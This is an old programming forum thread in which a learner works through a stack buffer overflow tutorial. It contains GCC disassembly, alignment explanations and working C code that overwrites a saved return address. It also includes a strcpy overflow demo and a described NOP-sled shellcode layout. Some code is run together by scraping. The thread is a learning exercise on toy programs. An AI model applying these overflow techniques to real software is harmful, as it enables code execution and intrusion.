Problems with GCC code generation

Started by
5 comments, last by Ilici 18 years, 8 months ago
I'm following this tutorials and tried to compile one of the sources they list:

void function(int a, int b, int c) {
   char buffer1[5];
   char buffer2[10];
   int *ret;

   ret = buffer1 + 12;
   (*ret) += 8; //change here to insert the address of printf
}

void main() {
  int x;

  x = 0;
  function(1,2,3);
  x = 1;
  printf("%d\n",x);
}
The problem is that, disassembling with gdb in "main", they get this:

0x8000490 <main>:       pushl  %ebp
0x8000491 <main+1>:     movl   %esp,%ebp
0x8000493 <main+3>:     subl   $0x4,%esp
0x8000496 <main+6>:     movl   $0x0,0xfffffffc(%ebp)
0x800049d <main+13>:    pushl  $0x3
0x800049f <main+15>:    pushl  $0x2
0x80004a1 <main+17>:    pushl  $0x1
0x80004a3 <main+19>:    call   0x8000470 <function>
0x80004a8 <main+24>:    addl   $0xc,%esp
0x80004ab <main+27>:    movl   $0x1,0xfffffffc(%ebp)
0x80004b2 <main+34>:    movl   0xfffffffc(%ebp),%eax
0x80004b5 <main+37>:    pushl  %eax
0x80004b6 <main+38>:    pushl  $0x80004f8
0x80004bb <main+43>:    call   0x8000378 <printf>
0x80004c0 <main+48>:    addl   $0x8,%esp
0x80004c3 <main+51>:    movl   %ebp,%esp
0x80004c5 <main+53>:    popl   %ebp
0x80004c6 <main+54>:    ret
0x80004c7 <main+55>:    nop
and I get:

0x0804821e <main+0>:    push   %ebp
0x0804821f <main+1>:    mov    %esp,%ebp
0x08048221 <main+3>:    sub    $0x18,%esp
0x08048224 <main+6>:    and    $0xfffffff0,%esp
0x08048227 <main+9>:    mov    $0x0,%eax
0x0804822c <main+14>:   sub    %eax,%esp
0x0804822e <main+16>:   movl   $0x0,0xfffffffc(%ebp)
0x08048235 <main+23>:   movl   $0x3,0x8(%esp)
0x0804823d <main+31>:   movl   $0x2,0x4(%esp)
0x08048245 <main+39>:   movl   $0x1,(%esp)
0x0804824c <main+46>:   call   0x8048204 <function>
0x08048251 <main+51>:   movl   $0x1,0xfffffffc(%ebp)
0x08048258 <main+58>:   mov    0xfffffffc(%ebp),%eax
0x0804825b <main+61>:   mov    %eax,0x4(%esp)
0x0804825f <main+65>:   movl   $0x8095d88,(%esp)
0x08048266 <main+72>:   call   0x8049650 <printf>
0x0804826b <main+77>:   leave
0x0804826c <main+78>:   ret
I do understant that both asm sources are equivalent (do the same thing) but the difference is obvious: one uses push and pop, the other addresses the stack directly. Is there a gcc option to get the same code? I'm using gcc 3.3.5, running "gcc -o file -ggdb -static file.c". Also disassembling "function" I was expecting the stack pointer (the BP register) to be decremented by 28 bytes (12 for buffer2, 8 for buffer1, 4 for ret, 4 for the saved BP register) but the disassembly shows othewise:

0x08048204 <function+0>:        push   %ebp
0x08048205 <function+1>:        mov    %esp,%ebp
0x08048207 <function+3>:        sub    $0x38,%esp
0x0804820a <function+6>:        lea    0xffffffe8(%ebp),%eax
0x0804820d <function+9>:        add    $0xc,%eax
0x08048210 <function+12>:       mov    %eax,0xffffffd4(%ebp)
0x08048213 <function+15>:       mov    0xffffffd4(%ebp),%eax
0x08048216 <function+18>:       movl   $0x8049650,(%eax)
0x0804821c <function+24>:       leave
0x0804821d <function+25>:       ret
Am I not getting how the function call stack operations work?
Advertisement
You probably just have a different version of GCC than they had.
Are you sure that this is actually from the code you posted?
0x08048204 <function+0>:        push   %ebp0x08048205 <function+1>:        mov    %esp,%ebp0x08048207 <function+3>:        sub    $0x38,%esp0x0804820a <function+6>:        lea    0xffffffe8(%ebp),%eax0x0804820d <function+9>:        add    $0xc,%eax0x08048210 <function+12>:       mov    %eax,0xffffffd4(%ebp)0x08048213 <function+15>:       mov    0xffffffd4(%ebp),%eax0x08048216 <function+18>:       movl   $0x8049650,(%eax)0x0804821c <function+24>:       leave0x0804821d <function+25>:       ret

This line 'movl $0x8049650,(%eax)' isn't (*ret)+=8 as it should be.

Also worth pointing out is that 'ret = buffer1 + 12' isn't actually valid C as you aren't allowed to access arrays out of bounds. Of course most C compilers accept that kind of code.

And nmi below is probably right.
I think you run into alignment trouble. This may depend on how gcc was configured, which version of gcc is used and on which system it is used.
The gcc tries to conserve the stack alignment if possible, since on some systems (like Pentium etc.) unaligned access makes program execution slower or on some other systems (like RISC architectures) it may even cause the processor to throw an exception or at least access the wrong memory address.

Since gcc supports mmx and sse instructions, which also have 16 byte memory operands, the stack has an alignment of 16 bytes. You can see that in function, where 0x38 + 4 (for ebp) + 4 (for ret) is a multiple of 16.

So you may either want to turn of alignment (refer to the gcc command line option reference), or take this into account when doing the address calculation.
Quote:
This line 'movl $0x8049650,(%eax)' isn't (*ret)+=8 as it should be.

You're right, I forgot i changed it to (*ret) = printf;

Quote:
Also worth pointing out is that 'ret = buffer1 + 12' isn't actually valid C as you aren't allowed to access arrays out of bounds. Of course most C compilers accept that kind of code.

That's exactly what I'm counting on :D

Thanks nmi, but I couldn't find any option to turn off alignement. There was "-mno-code-align" but it's only for some other architecture. I guess i'll live with 16 byte alignement.

I changed the code to:
void piggyback(){        printf("I'm not your average function!\n");}void legit_fn(){        char buf[16];        //16 bytes for buf, 16 bytes for ret, 4 for the previous BP        unsigned * ret = buf + 16 + 16 + 4;        *ret = (unsigned)piggyback;}


legit_fn disassembles to:
0x08048218 <legit_fn+0>:        push   %ebp0x08048219 <legit_fn+1>:        mov    %esp,%ebp0x0804821b <legit_fn+3>:        sub    $0x28,%esp0x0804821e <legit_fn+6>:        lea    0xffffffe8(%ebp),%eax0x08048221 <legit_fn+9>:        add    $0x24,%eax0x08048224 <legit_fn+12>:       mov    %eax,0xffffffe4(%ebp)0x08048227 <legit_fn+15>:       mov    0xffffffe4(%ebp),%eax0x0804822a <legit_fn+18>:       movl   $0x8048204,(%eax)0x08048230 <legit_fn+24>:       leave0x08048231 <legit_fn+25>:       ret

To me this seems like it should work, but it doesn't. Any ideas?
You can try this simple example:
#include <stdio.h>// to make things easiertypedef void (*func_t)();void piggyback(){        printf("I'm not your average function!\n");}void legit_fn(int param){	// calculate position of return address	// stack should look like this:	//    param	//    ret	//    old ebp	func_t* func = (func_t*)( ((char*)&param) - 4);		// reset function address to piggyback	*func = piggyback;	}int main(){	legit_fn(42);	return 0;}


It should print out the message "I'm not your average function!", then end with an exception.

I changed it to take the address of the parameter param, since the code that calls the function looks like this:
push 42call legit_fn


So the return address should be stored just 4 bytes below param.

If you want to use a local buffer instead, I recommend compiling the program, then looking at the assembly code to do the address calculation, then change the address in the source and then recheck if the compiler still generates the same code (this should be the case if optimisations are off).
Buffer overflow attacks usually rely on the fact, that data of unknown length is copied unchecked onto the stack. An example for such a function is sprintf, the checked one is snprintf. Other functions are strcat, strcmp and strcpy.

To make sure that you always hit the return address, why not just overwrite the first 100 values with a new address. Then put your new code after that. This way you do not have to exactly hit the return address, you will get it if it falls into the first 100 pointers you have modified.

To activate your code you just copied onto the stack, you must make sure that the modified return address jumps to this code. Just put nop opcodes after the modified return addresses, enough to make sure that your modified return address hits one of those nops. After the nop opcodes, put your own (position independent) code. The gcc has an option to create such code, just in case you want to write it in C/C++.

So the code passed to the function (e.g. via a string) should look like this:
new_ret
new_ret
...
new_ret
nop
...
nop
your_code
That's a nice way to do it. I managed to get this to work:

typedef void (*func_t) ();void piggyback(){        printf("I'm not your average function!\n");}void legit_fn(int param){        char test[8];        func_t* ret;        //4 bytes for the previous EBP, 8 for "test"        ret = (func_t*) ( ((char*)&test) + 4 + 8 );        *ret = piggyback;}


However if I use 16 or more bytes for the buffer, it doesn't work anymore..

I now made this:
#include <stdio.h>typedef void (*func_t) ();union{        func_t* func;        char data[4];} container;void piggyback(){        printf("W00t!\n");}void exploitable(char* param){        char somebuffer[32];        strcpy(somebuffer, param);}int main(){        char smash[128];        container.func = piggyback;        int i;        for (i = 0; i < 64; i++) smash = container.data;<br>        exploitable(smash);<br>        return 0;<br>}<br></pre><br><br>which prints "W00t" 5 times actually :D, I now have to change it to execute code from the "smash" buffer.<br><br><!–EDIT–><span class=editedby><!–/EDIT–>[Edited by - Ilici on August 11, 2005 4:11:09 PM]<!–EDIT–></span><!–/EDIT–>

This topic is closed to new replies.

Advertisement